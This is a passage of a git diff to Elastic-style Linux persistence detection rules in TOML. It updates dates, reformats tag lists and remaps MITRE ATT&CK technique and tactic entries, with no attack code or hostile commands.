"https://attack.mitre.org/techniques/T1021/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_apt_package_manager_execution.toml b/rules/linux/persistence_apt_package_manager_execution.toml index 121bf350707..4b6cb28a48d 100644 --- a/rules/linux/persistence_apt_package_manager_execution.toml +++ b/rules/linux/persistence_apt_package_manager_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,18 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -136,34 +125,6 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.016" -name = "Installer Packages" -reference = "https://attack.mitre.org/techniques/T1546/016/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -182,7 +143,17 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_apt_package_manager_file_creation.toml b/rules/linux/persistence_apt_package_manager_file_creation.toml index 6fa37d13b3e..bc63025e540 100644 --- a/rules/linux/persistence_apt_package_manager_file_creation.toml +++ b/rules/linux/persistence_apt_package_manager_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,15 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -143,11 +135,6 @@ file.path : "/etc/apt/apt.conf.d/*" and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -158,20 +145,7 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_apt_package_manager_netcon.toml b/rules/linux/persistence_apt_package_manager_netcon.toml index 7e83bb830d6..771e00482fd 100644 --- a/rules/linux/persistence_apt_package_manager_netcon.toml +++ b/rules/linux/persistence_apt_package_manager_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,16 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Command and Control", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -117,9 +108,22 @@ sequence by host.id with maxspan=5s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1546" @@ -131,28 +135,7 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml index c0e77855ab2..515d9e16b55 100644 --- a/rules/linux/persistence_at_job_creation.toml +++ b/rules/linux/persistence_at_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -130,9 +130,9 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -148,9 +148,9 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -166,6 +166,6 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml index 291d6f8eaa7..2e4260eed94 100644 --- a/rules/linux/persistence_boot_file_copy.toml +++ b/rules/linux/persistence_boot_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,15 +77,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -130,43 +122,20 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_bpf_probe_write_user.toml b/rules/linux/persistence_bpf_probe_write_user.toml index 7e66f75cc0d..000429e62b0 100644 --- a/rules/linux/persistence_bpf_probe_write_user.toml +++ b/rules/linux/persistence_bpf_probe_write_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/28" integration = ["system"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,14 +76,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" query = ''' @@ -93,23 +86,6 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1014" name = "Rootkit" diff --git a/rules/linux/persistence_bpf_program_or_map_load.toml b/rules/linux/persistence_bpf_program_or_map_load.toml index af4757fbc16..7f6ca634f5e 100644 --- a/rules/linux/persistence_bpf_program_or_map_load.toml +++ b/rules/linux/persistence_bpf_program_or_map_load.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ references = [ risk_score = 47 rule_id = "2d05fefd-40ba-43ae-af0c-3c25e86b54f1" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Threat: Rootkit", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: Rootkit", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -91,24 +78,6 @@ process.name == "bpftool" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1014" name = "Rootkit" diff --git a/rules/linux/persistence_chkconfig_service_add.toml b/rules/linux/persistence_chkconfig_service_add.toml index 554ad767f59..564eb7dc63f 100644 --- a/rules/linux/persistence_chkconfig_service_add.toml +++ b/rules/linux/persistence_chkconfig_service_add.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/22" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -196,6 +196,11 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml index 523302ed1a5..6d78f771a3b 100644 --- a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml +++ b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -145,17 +145,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" query = ''' @@ -182,19 +172,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" @@ -209,26 +186,11 @@ reference = "https://attack.mitre.org/tactics/TA0006/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml index 752d0925262..3b65170c93f 100644 --- a/rules/linux/persistence_cron_job_creation.toml +++ b/rules/linux/persistence_cron_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -164,16 +164,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -227,27 +218,9 @@ name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -263,6 +236,6 @@ name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_dbus_service_creation.toml b/rules/linux/persistence_dbus_service_creation.toml index 386571da585..82ce58f171f 100644 --- a/rules/linux/persistence_dbus_service_creation.toml +++ b/rules/linux/persistence_dbus_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -134,9 +134,9 @@ file.extension in ("service", "conf") and file.path like ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" @@ -147,9 +147,9 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml index 6d9c71de08e..dc908e15502 100644 --- a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml +++ b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,18 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -123,40 +112,9 @@ process.parent.name == "dbus-daemon" and process.args_count > 1 and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml index 10ca2105f97..f6f393dd312 100644 --- a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,17 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -129,21 +119,6 @@ file.path like ("/usr/lib/python*/site-packages/dnf-plugins/*", "/etc/dnf/plugin [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.016" -name = "Installer Packages" -reference = "https://attack.mitre.org/techniques/T1546/016/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -153,11 +128,3 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml index 595ab2d545a..509d2fcb489 100644 --- a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml +++ b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,14 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -98,11 +91,6 @@ process.args:("-i" or "--install") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -113,11 +101,6 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -127,20 +110,19 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_dpkg_unusual_execution.toml b/rules/linux/persistence_dpkg_unusual_execution.toml index 73a6322b954..41b46686434 100644 --- a/rules/linux/persistence_dpkg_unusual_execution.toml +++ b/rules/linux/persistence_dpkg_unusual_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,14 +78,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,16 +105,6 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ 